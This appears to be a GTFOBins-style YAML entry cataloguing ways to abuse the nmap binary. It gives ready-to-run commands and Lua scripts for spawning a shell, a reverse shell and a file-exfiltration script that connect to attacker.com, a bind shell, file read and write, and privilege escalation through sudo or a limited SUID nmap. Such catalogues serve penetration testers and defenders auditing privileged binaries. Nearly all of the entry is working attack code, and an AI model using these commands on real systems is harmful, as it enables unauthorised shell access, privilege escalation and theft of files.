---
functions:
shell:
- description: Input echo is disabled.
code: |
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
nmap --script=$TF
- description: The interactive mode, available on versions 2.02 to 5.21, can be used to execute shell commands.
code: |
nmap --interactive
nmap> !sh
non-interactive-reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
TF=$(mktemp)
echo 'local s=require("socket");
local t=assert(s.tcp());
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
while true do
local r,x=t:receive();local f=assert(io.popen(r,"r"));
local b=assert(f:read("*a"));t:send(b);
end;
f:close();t:close();' > $TF
nmap --script=$TF
non-interactive-bind-shell:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: |
export LPORT=12345
TF=$(mktemp)
echo 'local k=require("socket");
local s=assert(k.bind("*",os.getenv("LPORT")));
local c=s:accept();
while true do
local r,x=c:receive();local f=assert(io.popen(r,"r"));
local b=assert(f:read("*a"));c:send(b);
end;c:close();f:close();' > $TF
nmap --script=$TF
file-upload:
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
code: |
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
TF=$(mktemp)
echo 'local f=io.open(os.getenv("LFILE"), 'rb')
local d=f:read("*a")
io.close(f);
local s=require("socket");
local t=assert(s.tcp());
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
t:send(d);
t:close();' > $TF
nmap --script=$TF
file-download:
- description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345
< "file_to_send"` on the attacker box to send the file.
code: |
export LPORT=12345
export LFILE=file_to_save
TF=$(mktemp)
echo 'local k=require("socket");
local s=assert(k.bind("*",os.getenv("LPORT")));
local c=s:accept();
local d,x=c:receive("*a");
c:close();
local f=io.open(os.getenv("LFILE"), "wb");
f:write(d);
io.close(f);' > $TF
nmap --script=$TF
file-write:
- code: |
TF=$(mktemp)
echo 'lua -e 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);' > $TF
nmap --script=$TF
file-read:
- code: |
TF=$(mktemp)
echo 'lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF
nmap --script=$TF
sudo:
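- description: Input echo is disabled. The script runs with whatever privileges sudo grants to nmap, so a sudoers entry permitting nmap with arbitrary arguments amounts to a shell at that privilege level.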
code: |
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF
- description: The interactive mode, available on versions 2.02 to 5.21, can be used to execute shell commands.
code: |
sudo nmap --interactive
nmap> !sh
limited-suid:
- description: Input echo is disabled.
code: |
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
./nmap --script=$TF
---